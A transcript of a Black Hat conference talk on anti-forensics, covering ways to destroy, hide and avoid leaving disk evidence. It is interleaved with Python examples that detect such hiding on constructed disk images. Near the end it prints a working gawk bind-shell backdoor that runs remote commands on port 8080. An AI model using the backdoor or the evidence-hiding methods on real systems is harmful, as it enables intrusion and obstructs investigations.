the art of defiling - black hat · 2015-05-28 · the art of defiling defeating forensic analysis...
TRANSCRIPT
![Page 1: The Art of Defiling - Black Hat · 2015-05-28 · The Art of Defiling Defeating Forensic Analysis the grugq. Overview ... In memory execution. Deep Disking It came from below the](https://reader033.vdocuments.mx/reader033/viewer/2022060307/5f09ea3d7e708231d4291cef/html5/thumbnails/1.jpg)
The Art of Defiling
Defeating Forensic Analysis
the grugq
Overview
Introduction
Forensics
Anti-Forensics
Anti-Forensics in Action
Q & A
Introduction
Who: the grugq
What: break forensic tools
Why: under-researched and critical
Forensics
Digital Forensic Investigations: Lightning Tour
Forensics Overview
Introduction: the digital forensics process
Acquisition, Preservation, Identification, Evaluation, Presentation
Conclusion
Introduction
Scientific method
Analysis vs. investigation
Evidence: inculpatory, exculpatory
Tampering
Chain of evidence
Forensics Outline
Data Capture: get everything which might contain evidence
Data Analysis: search for evidence
Data Presentation: present evidence
Forensic Process Overview
Acquisition
Preservation
Identification
Evaluation
Presentation
Acquisition
Capture data for later analysis
Volatile data: memory, network traffic
Non-volatile data: file system contents
Start the chain of evidence documentation
Preservation
Bit level copy
Hash sums
Labeling
Cont. chain of evidence documentation
Start analysis documentation
Identification (graphic): bitstream → file systems → files → evidence
Identification
Bit level copy as input data
Parse data for file system representation
Extract all available data: deleted content, OS files, logs, user files
Update analysis documentation
Evaluation
Examine data
Determine relevance to case
If more data is required, go to Identification
Finish analysis documentation
Presentation
Present all evidence: employment tribunal, court
Conclude chain of evidence documentation
Conclusion
Forensics is a procedural, scientific process:
Acquisition
Preservation
Identification
Evaluation
Presentation
Reproducible results
Anti-Forensics
Reducing the Quantity and Quality of Forensic Evidence
(since 1999)
Overview
Introduction
Digital forensics: the problems
Attacking the forensic process
Anti-Forensic Strategies
Anti-Forensic Introduction
Mitigate the effectiveness of forensic investigation
Who uses it: hackers, dodgy employees, al Qaeda, pedophiles
Digital Forensics: The Problems
Forensic analysts have issues:
Frequently short on time
Generally short on skills
Almost always slaves to their tools
Forensic tools have bugs:
Traditional bugs, e.g. buffer overflows, format strings
File system implementation bugs
Attacking the Forensic Process
Forensics as security technology
As vulnerable as other technologies, but less scrutinized than other technologies
Attacks for each stage of forensic process
Countering Data Capture
Acquisition: don't arouse suspicion, destroy hardware, eradicate the data
Preservation: nothing I can think of that's useful
Countering Data Analysis
Identification: hide the evidence, don't leave any evidence
Evaluation: encrypt everything, proprietary data formats
Countering Data Presentation
Presentation: the Trojan defense
"Something" other than the computer owner did it
Invisible Trojan Defense: the Wookie defense of Information Security
Confuse the judge with "doubts"
Most trials still rely on a confession: "I'm a salesman. My job is to sell people jail sentences."
Anti-Forensic Strategies
The Anti-Forensic Principle: data is evidence; prevent it from being found
Data Destruction
Data Hiding
Data Contraception
Data Destruction
More difficult than it sounds: file content and file system meta data both have to go
Completely remove all relevant data
Alter file system meta-data: time stamps
Restore file system to pre-file state
File system is not a secure, trusted log
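The time stamp point deserves a concrete check. On Linux and the BSDs, userland can set a file's atime and mtime with utime(2), but ctime (inode change time) is written by the kernel and cannot be set through the file API; the act of forging mtime stamps ctime with "now", so a file whose ctime is far later than its mtime has had its inode touched after its content. The following is an added example written for this page, not a tool from the talk: it forges mtime on a constructed temp file and then runs the ctime-versus-mtime sweep an analyst would use to find such files. The one-hour gap threshold is an assumption. The caveat matches the slide: chmod, chown and rename also bump ctime, an attacker with root can move the system clock or write the inode raw (debugfs), and on Windows st_ctime is creation time, so this is a lead, not proof.

```python
import os
import tempfile
import time


def backdate(path, seconds_ago):
    """Push atime and mtime of `path` into the past with utime(2), as a timestamp
    forging tool would, and return the resulting POSIX stamps."""
    target = time.time() - seconds_ago
    os.utime(path, (target, target))   # userland controls atime and mtime ...
    st = os.stat(path)                 # ... but the kernel just stamped ctime with "now"
    return {"atime": st.st_atime, "mtime": st.st_mtime, "ctime": st.st_ctime}


def ctime_anomalies(root, min_gap=3600):
    """Files under `root` whose ctime is later than their mtime by more than `min_gap`
    seconds: the inode was changed after the content it claims to carry. Ordinary
    chmod/chown/rename does this too, so treat the output as leads, not proof."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if st.st_ctime - st.st_mtime > min_gap:
                hits.append((p, st.st_ctime - st.st_mtime))
    return hits


def demo():
    """Constructed scenario: one forged file and one untouched file in a temp dir.
    Returns the forged file's stamps and the base names the sweep flagged."""
    with tempfile.TemporaryDirectory() as d:
        forged, honest = os.path.join(d, "forged.log"), os.path.join(d, "honest.log")
        for p in (forged, honest):
            with open(p, "wb") as f:
                f.write(b"constructed sample content\n")
        stamps = backdate(forged, 30 * 24 * 3600)          # mtime: thirty days ago
        flagged = [os.path.basename(p) for p, _ in ctime_anomalies(d)]
        return {"stamps": stamps, "flagged": flagged}
```

The sweep is cheap enough to run over a whole mounted image; on a real case the interesting output is the cluster of files whose gap is identical to the second, which is what a tool that backdates many files in one pass leaves behind.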
Data Hiding – Requirements
Covert: exploit bugs in forensic tools (temporarily; ergo, insecure for long term storage)
Reliable: data must not disappear
Secure: can't be accessed without the correct tools; encrypted
Data Hiding Methodology
"Ladies and Gentlemen, I'm here to talk about FISTing"
Filesystem Insertion & Subversion Technique
FISTing is inserting data into places it doesn't belong
Data storage in meta-data files e.g. Journals, directory files, OLE2 files, etc.
Modifying meta-data is dangerous! Obey the FSCK!
What holes can you FIST?
Holes for FISTing (graphic): the FS specification, fsck, the kernel and forensic tools; FIST here, in the gaps between them
FISTing wrap up
Powerful methodology for data hiding
Effective against most forensic analysis
FISTing implementations will be explored later
Data Contraception
No data is good data
Two routes to practice "safe hacking":
Reduce the quantity of data: minimize disk activity, evidence prophylactics
Reduce the quality of data: common tools rather than custom ones
Reducing quantity
Non-evidentiary rootkits / backdoors: in memory patching
In memory execution: scripting via stdin rather than a file; binaries via userland exec()
Reducing quantity cont.
Evidence prophylactics insulate code from the OS
IUDs provide access to an address space: Inter/Intra Userland Device
Process puppeteering: Immunitysec's Mosdef, CORE-SDI's Impact
Reducing quality
Common tools reveal little about intent or purpose
Tools built from shell scripts
Anti-Forensics in Action
File System Attacks Gone Wild! Live! Uncensored!
Overview
Below the file system: partition table attacks
Within the file system: ext2fs attacks
Beyond the file system: in memory execution
Deep Disking
It came from below the filesystem!
Deep Disking: Introduction
Partition table is below the FS layer
Partition table organizes the hard disk into "partitions"
Partitions are not in hardware; they only have meaning for software which cares: operating system, disk editors, forensic tools
Deep Disking: Anti-Forensics
Pros:
File system neutral
Attacks on forensic tool integrity, which is usually taken for granted
Cons:
Exploitation is complex and dangerous
Not useful for post OS install attacks
High chance of data loss
Can break operating systems
Partition Table Layout
Partition table is comprised of one or more partition vectors
A partition vector contains up to four partition table entries
First partition vector (primary partition table) may point to an extended partition
Extended partition contains a linked list of partition vectors
Partition Table Layout (graphic)
Structures: partition table entry
struct partition_entry {
    unsigned char active;      /* 0x80 if this is the bootable (active) partition */
    unsigned char start_head;  /* CHS start: head (legacy, ignored by LBA-aware code) */
    unsigned char start_sec;   /* CHS start: sector in the low 6 bits, cylinder high bits above */
    unsigned char start_cyl;   /* CHS start: low 8 bits of the cylinder */
    unsigned char type;        /* partition type, e.g. 0x05 / 0x0f extended, 0x83 Linux */
    unsigned char end_head;    /* CHS end: head */
    unsigned char end_sec;     /* CHS end: sector */
    unsigned char end_cyl;     /* CHS end: cylinder */
    unsigned int  first_sec;   /* LBA of the first sector of the partition (32-bit) */
    unsigned int  num_sec;     /* number of sectors in the partition (32-bit) */
} __attribute__((packed));     /* 16 bytes; four of these sit at offset 446 of the sector */
Partition Table: Attacks
Excessive extended partitions
Extra “extended” partition vector entries
Errors in table alignment
Partition table FISTing
Excessive Extended Partition Vectors
Assumption: there is a limit to the number of extended partition vectors in the linked list
Technique: create more than n
Cause error conditions: possibly buffer overflows, definitely an abort
Extra Extended Partition Tables
Assumption: only one extended partition table entry per extended partition vector
Technique: multiple extended partition table entries
Can create disk space invisible to disk editors and forensic tools
Windows and Linux can see these entries
Errors in Table Alignment
Assumption: sum of all partition entries is equivalent to disk space size
Technique: misalignment of partition table entries; cause buffer overflows / underflows
Technique: restorable logical partition; restore for use, delete when done (a popular technique with many pedophiles)
Partition Table FISTing
Partition start is offset 64 sectors
Extended partition tables contain 446 bytesof padding
Just under 32k per extended partitionvector
Not a high capacity data store
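Every trick in this section rests on a parser trusting the partition table: following the EBR linked list without a hop limit or cycle check, assuming one link entry per vector, assuming the entries tile the disk, and never looking at the 446-byte padding of an extended partition table or at the gap before the first partition. The following is an added example written for this page, not the grugq's code or any forensic tool's: a small MBR/EBR walker over a constructed sparse disk image that follows the chain with a hop limit and loop detection, flags vectors with more than one extended link entry, reports non-zero bytes in EBR padding, checks that the partitions tile the disk, and lists written sectors outside every partition. The MAX_EBR_CHAIN limit, the Disk class and the sample layout (one primary, two EBRs carrying the slide's tricks) are assumptions of the example.

```python
import struct
from collections import namedtuple

SECTOR = 512
EXTENDED_TYPES = {0x05, 0x0F, 0x85}   # DOS extended, W95 extended (LBA), Linux extended
MAX_EBR_CHAIN = 64                     # assumption: this example's own limit on the EBR list
ENTRY = struct.Struct("<B3xB3xII")     # active, (CHS start), type, (CHS end), first LBA, sectors
Part = namedtuple("Part", "ptype start count")   # start is an absolute LBA


class Disk:
    """Sparse in-memory disk image: sectors never written read back as zeros."""
    def __init__(self, total_sectors):
        self.total, self.sectors = total_sectors, {}

    def read(self, lba):
        return self.sectors.get(lba, bytes(SECTOR))

    def write(self, lba, data):
        self.sectors[lba] = bytes(data)


def pack_entry(ptype, first, num, active=0):
    return ENTRY.pack(active, ptype, first, num)   # CHS fields left zero


def make_table(code, entries):
    """512-byte MBR/EBR: 446 bytes of code or padding, four 16-byte entries, 0x55AA."""
    entries = entries + [bytes(16)] * (4 - len(entries))
    return code.ljust(446, b"\0") + b"".join(entries) + b"\x55\xaa"


def parse_table(sector):
    """[(type, first, num)] for the four entries, or None if the signature is missing."""
    if sector[510:512] != b"\x55\xaa":
        return None
    return [ENTRY.unpack_from(sector, 446 + 16 * i)[1:] for i in range(4)]


def walk(disk):
    """Follow the MBR and EBR chain. Returns (partitions, findings); findings are the
    conditions a parser that trusts the table either misses or crashes on."""
    findings, parts, ext_base = [], [], None
    for ptype, first, num in parse_table(disk.read(0)) or []:
        if ptype in EXTENDED_TYPES:
            if ext_base is not None:
                findings.append("mbr: more than one extended entry")
            ext_base = first
        elif ptype:
            parts.append(Part(ptype, first, num))
    tables, cur = {0}, ext_base
    while cur is not None:
        if cur in tables:
            findings.append(f"ebr chain loops back to lba {cur}")
            break
        if len(tables) > MAX_EBR_CHAIN:
            findings.append(f"ebr chain longer than {MAX_EBR_CHAIN} vectors")
            break
        tables.add(cur)
        raw = disk.read(cur)
        tbl = parse_table(raw)
        if tbl is None:
            findings.append(f"ebr at lba {cur}: missing 0x55AA signature")
            break
        if any(raw[:446]):   # EBRs carry no boot code, so this area should be all zero
            findings.append(f"ebr at lba {cur}: non-zero bytes in 446-byte padding")
        links = [e for e in tbl if e[0] in EXTENDED_TYPES]
        if len(links) > 1:
            findings.append(f"ebr at lba {cur}: {len(links)} extended link entries, only the first is followed")
        for ptype, first, num in tbl:
            if ptype and ptype not in EXTENDED_TYPES:
                parts.append(Part(ptype, cur + first, num))   # logical entry: relative to this EBR
        cur = ext_base + links[0][1] if links else None        # link entry: relative to extended base
    parts.sort(key=lambda p: p.start)
    prev = 1
    for p in parts:
        if p.start < prev:
            findings.append(f"partition at lba {p.start} overlaps the one before it")
        if p.start + p.count > disk.total:
            findings.append(f"partition at lba {p.start} runs past the end of the disk")
        prev = max(prev, p.start + p.count)
    if prev < disk.total:
        findings.append(f"{disk.total - prev} unallocated sectors after lba {prev}")
    stray = sorted(l for l in disk.sectors
                   if l not in tables and not any(p.start <= l < p.start + p.count for p in parts))
    if stray:
        findings.append(f"non-zero data in unallocated sectors: {stray}")
    return parts, findings


def build_sample_disk():
    """Constructed 100000-sector disk: one primary partition and an extended partition with
    two EBRs, carrying an extra link entry, data in EBR padding, and orphaned data past the
    last logical partition (what a deleted, 'restorable' partition leaves behind)."""
    d = Disk(100000)
    d.write(0, make_table(b"", [pack_entry(0x83, 63, 20000, 0x80), pack_entry(0x05, 20063, 79937)]))
    d.write(20063, make_table(b"", [pack_entry(0x83, 63, 10000),
                                    pack_entry(0x05, 10063, 10063),    # followed: next EBR at 30126
                                    pack_entry(0x05, 40000, 5000)]))   # extra link: kernels ignore it
    d.write(30126, make_table(b"constructed hidden data", [pack_entry(0x83, 63, 10000)]))
    d.write(60000, b"\x41" * SECTOR)                                    # orphaned data, no owner
    return d
```

Run `walk(build_sample_disk())` to see three partitions and four findings. The walker only reports; the decision whether unallocated space or EBR padding holds something is left to carving that region, which is the step the slide says most tools skip.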
File System FISTing
How to destroy your file system in just a few easy steps
File System Components
File system layer: meta data for the OS
Data content layer: data storage units
Meta data layer: organize data units into files
Name layer: human addressable interface for files
Unix file system
File system layer: super block
Data content layer: block
Meta data layer: inode
Name layer: directory file
Unix inodes
File meta data: reference counts, owner, group, permissions; time stamps: modification, access, change
List of data blocks, a flexible extended array: direct blocks, indirect blocks, doubly indirect block, trebly indirect block
Unix inodes (graphic): inode metadata (size, owner, mode etc.) followed by block pointers; pointers lead to data blocks directly or through an indirect block
Unix directory files
Link inode numbers to filenames
struct dirent {
    int   inode;      /* inode number; 0 marks an unused (deleted) entry */
    short rec_len;    /* length of this record, including any padding */
    short name_len;   /* length of the name */
    char  name[];     /* the name, not NUL terminated */
};

Example directory file contents (graphic), one entry per line as inode, name, rec_len:
  0    deleted        16
  12   somefile       32
  13   lamefile       16
  123  lastfile       128
  11   lost & found   16
  13   lame file      16
  12   somefile       32
  123  lastfile       128
  0    deleted        16
Unix file system attacks
Rune fs: bad blocks inode
Waffen fs: spoofed journal file
KY fs: null directory entries
Data mule fs: reserved space
Rune FS
Bad blocks inode is 1, root ('/') inode is 2
Exploits bad bounds checking in TCT:
    if (inode < ROOT_INODE || inode > LAST_INO)
        return BAD_INODE;
With ROOT_INODE = 2, inode 1 fails the check and its data blocks are never examined
Implemented as a regular file: massive data storage
Waffen FS
Adds an ext3 journal to an ext2 FS
Kernel determines FS type via /etc/fstab; e2fsck determines FS type via superblock flags
Exploits lame forensic tools which only implement one FS type (ext2)
Usually 32 MB of storage (average journal size)
KY FS
Data storage in directory files
Utilizes null directory entries:
    dirent {
        inode    = 0;
        rec_len  = BLOCK_SIZE;
        name_len = 0;
        name[]   = …
    }
Almost unlimited space
KY FS details
Kernel + fsck pseudo code:
    for (dp = dir; dp < dir_end; dp = (struct dirent *)((char *)dp + dp->rec_len))
        if (dp->inode == 0)   /* deleted? skip it, whatever the rest of the record holds */
            continue;
Forensic tools pseudo code:
    if (dp->inode == 0 && dp->name_len > 0)
        /* recover deleted file name */
An entry with inode == 0 and name_len == 0 is skipped by both: the kernel never reads past the header, and the tool sees no name to recover
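Rune FS and KY FS are the same bug in two places: the tool's idea of what is worth parsing is narrower than what the kernel will happily carry. The following is an added example written for this page, not code from the talk or from TCT: a Python walker over ext2 rev-1 directory entries (the real 8-byte header of inode, rec_len, name_len, file_type, rather than the slide's simplified struct), showing the kernel's view, the slide's naive forensic recovery, and a hardened check that looks at the whole body of every null entry; beside it, the TCT-style inode range check and a corrected one. The sample blocks and the payload are constructed.

```python
import struct

BLOCK_SIZE = 4096
DIRENT_HDR = struct.Struct("<IHBB")   # inode, rec_len, name_len, file_type (ext2 rev 1)
ROOT_INODE, BAD_BLOCKS_INODE = 2, 1


def pack_dirent(inode, name, rec_len=None, file_type=1):
    """Build one directory entry; rec_len defaults to the 4-byte-aligned minimum."""
    raw = name.encode()
    rec_len = rec_len or ((8 + len(raw) + 3) & ~3)
    return DIRENT_HDR.pack(inode, rec_len, len(raw), file_type) + raw.ljust(rec_len - 8, b"\0")


def iter_dirents(block):
    """Yield (offset, inode, rec_len, name_len, name) per entry, stopping at the first
    record that cannot be walked, which is what the kernel does."""
    off = 0
    while off + DIRENT_HDR.size <= len(block):
        inode, rec_len, name_len, _ = DIRENT_HDR.unpack_from(block, off)
        if rec_len < 8 or rec_len % 4 or off + rec_len > len(block):
            break
        yield off, inode, rec_len, name_len, block[off + 8: off + 8 + name_len]
        off += rec_len


def kernel_view(block):
    """Live names only: entries with inode == 0 are skipped, whatever else they hold."""
    return [name.decode() for _, inode, _, _, name in iter_dirents(block) if inode]


def naive_forensic_view(block):
    """The slide's recovery rule: inode == 0 and name_len > 0 means a deleted name.
    A KY FS entry (inode 0, name_len 0) is invisible to this rule."""
    return [name.decode() for _, inode, _, n, name in iter_dirents(block) if inode == 0 and n > 0]


def find_ky_payloads(block):
    """Hardened rule: inspect the whole body of every null entry, not just its name.
    Returns [(offset, payload)] for null entries carrying non-zero bytes past the name."""
    hits = []
    for off, inode, rec_len, name_len, _ in iter_dirents(block):
        if inode == 0:
            body = block[off + 8 + name_len: off + rec_len]
            if any(body):
                hits.append((off, body.rstrip(b"\0")))
    return hits


def tct_inode_in_range(inode, last_ino):
    """The bounds check quoted from TCT: inode 1 (bad blocks) is below ROOT_INODE and is
    rejected, so a Rune FS store in it is never looked at."""
    return not (inode < ROOT_INODE or inode > last_ino)


def fixed_inode_in_range(inode, last_ino):
    """Accept every numbered inode, reserved ones included; decide what to do with them later."""
    return 1 <= inode <= last_ino


def build_sample_blocks():
    """Constructed blocks. A: an ordinary directory ('.', '..', a live file, then a deleted
    file whose null entry still carries its name). B: a KY FS block, one null entry spanning
    the block with the payload where the name would be. Returns (A, B, payload)."""
    live = pack_dirent(2, ".", file_type=2) + pack_dirent(2, "..", file_type=2) + pack_dirent(12, "somefile")
    block_a = live + pack_dirent(0, "lamefile", rec_len=BLOCK_SIZE - len(live))
    payload = b"constructed KY FS payload, not a real key"
    block_b = DIRENT_HDR.pack(0, BLOCK_SIZE, 0, 0) + payload.ljust(BLOCK_SIZE - 8, b"\0")
    return block_a, block_b, payload
```

The kernel and the naive tool agree that block B is empty; only `find_ky_payloads` reports it. The same "read the whole record, not the fields you expect" rule is what turns the Rune FS check around: accepting inode 1 costs nothing on a clean file system, where it lists no blocks.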
Data Mule FS
Storage within file system meta-data structures: reserved space, padding
Remains untouched by kernel and fsck
Ignored by forensic tools, which are only interested in data and meta-data
Data Mule FS -- space
Super block: 759 bytes
Group descriptor: 14 bytes
Inode: 10 bytes
1G ext2 file system, 4k blocks (default):
Groups: 8
Super blocks: 4 (3036 bytes)
Group descriptors: 64 (896 bytes)
Inodes: 122112 (1221120 bytes)
Total: 1225052 bytes =~ 1196k =~ 1M
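The property that makes Data Mule FS work, that nothing legitimate reads the reserved bytes, is also what makes it easy to check for: on a plain ext2 file system the kernel and e2fsck of that era never touch those ranges, so anything non-zero in them was put there deliberately. The following is an added example written for this page, not the grugq's tool: a scanner over constructed superblock, group descriptor and inode images that reports non-zero bytes in the reserved ranges, plus the capacity arithmetic from the slide. The byte ranges are my reading of the ext2 rev-1 on-disk layout and are an assumption of the example (superblock s_reserved from offset 264 to the end; group descriptor bg_pad and bg_reserved after the 18 used bytes; inode i_faddr, i_pad1 and l_i_reserved2 of the Linux osd2 union); they give 760 bytes for the superblock where the slide counts 759. Newer ext4-aware tools do write some of the superblock tail, so on an ext4 volume the superblock range would need narrowing.

```python
import struct

SUPERBLOCK_LEN, GROUP_DESC_LEN, INODE_LEN = 1024, 32, 128
EXT2_MAGIC = 0xEF53

# Reserved/padding byte ranges per structure, ext2 rev 1 layout as this example assumes it.
PADDING = {
    "superblock": [(264, SUPERBLOCK_LEN)],        # s_reserved[190]
    "group_desc": [(18, GROUP_DESC_LEN)],         # bg_pad (2) + bg_reserved[3] (12)
    "inode": [(112, 116), (118, 120), (124, 128)],  # i_faddr, i_pad1, l_i_reserved2
}


def padding_bytes(kind):
    """Capacity a data mule gets from one structure of this kind."""
    return sum(end - start for start, end in PADDING[kind])


def mule_capacity(superblock_copies, group_desc_copies, inode_count):
    """Total hiding capacity in bytes: the slide's arithmetic with this example's sizes."""
    return (superblock_copies * padding_bytes("superblock")
            + group_desc_copies * padding_bytes("group_desc")
            + inode_count * padding_bytes("inode"))


def nonzero_padding(blob, kind):
    """[(start, end, payload)] for each reserved range of `blob` that is not all zero."""
    hits = []
    for start, end in PADDING[kind]:
        chunk = blob[start:end]
        if any(chunk):
            hits.append((start, end, chunk.strip(b"\0")))
    return hits


def scan(superblock, group_descs, inodes):
    """Scan one superblock, its group descriptor table and an inode table for mules.
    Returns [(kind, index, start, end, payload)]."""
    if struct.unpack_from("<H", superblock, 56)[0] != EXT2_MAGIC:   # s_magic
        raise ValueError("not an ext2 superblock")
    findings = [("superblock", 0) + hit for hit in nonzero_padding(superblock, "superblock")]
    for i, gd in enumerate(group_descs):
        findings += [("group_desc", i) + hit for hit in nonzero_padding(gd, "group_desc")]
    for i, ino in enumerate(inodes):
        findings += [("inode", i) + hit for hit in nonzero_padding(ino, "inode")]
    return findings


def build_samples():
    """Constructed structures: a superblock with a payload in s_reserved, one clean and
    one loaded group descriptor, one clean and one loaded inode."""
    sb = bytearray(SUPERBLOCK_LEN)
    struct.pack_into("<H", sb, 56, EXT2_MAGIC)
    sb[600:624] = b"constructed mule payload"
    clean_gd, mule_gd = bytearray(GROUP_DESC_LEN), bytearray(GROUP_DESC_LEN)
    struct.pack_into("<III", mule_gd, 0, 3, 4, 5)    # block bitmap, inode bitmap, inode table
    mule_gd[18:32] = b"14-byte secret"               # exactly the bg_pad + bg_reserved bytes
    clean_ino, mule_ino = bytearray(INODE_LEN), bytearray(INODE_LEN)
    mule_ino[124:128] = b"KEY!"                      # l_i_reserved2
    return bytes(sb), [bytes(clean_gd), bytes(mule_gd)], [bytes(clean_ino), bytes(mule_ino)]
```

On a real image, feed `scan` the primary superblock, the descriptor table that follows it, and each group's inode table in turn; the superblock backups are worth the same treatment, since a mule that only loads the primary copy is caught by comparing it with the backups.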
Outer Bounds
Beyond disk level based attacks
Evidence prophylactics
In process execution: Canvas (MOSDEF), CORE Impact (syscall proxying)
In memory execution: rexec, ftrans
Common tools
GDB based process puppeteering
Shell scripts: FS state conservation tools, log cleaners, backdoors
Gawk remote access shell

#!/usr/bin/gawk -f
BEGIN {
Port = 8080 # Port to listen on
Prompt = "bkd> " # Prompt to display
Service = "/inet/tcp/" Port "/0/0" # Open a listening port
while (1) {
do {
printf Prompt |& Service # Display the prompt
Service |& getline cmd # Read in the command
if (cmd) {
while ((cmd |& getline) > 0) # Execute the command and read response
print $0 |& Service # Return the response
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
Conclusion
Forensics is as vulnerable as other security technologies
File systems are not an accurate log of system activity
Your file system is 0wned
Q & A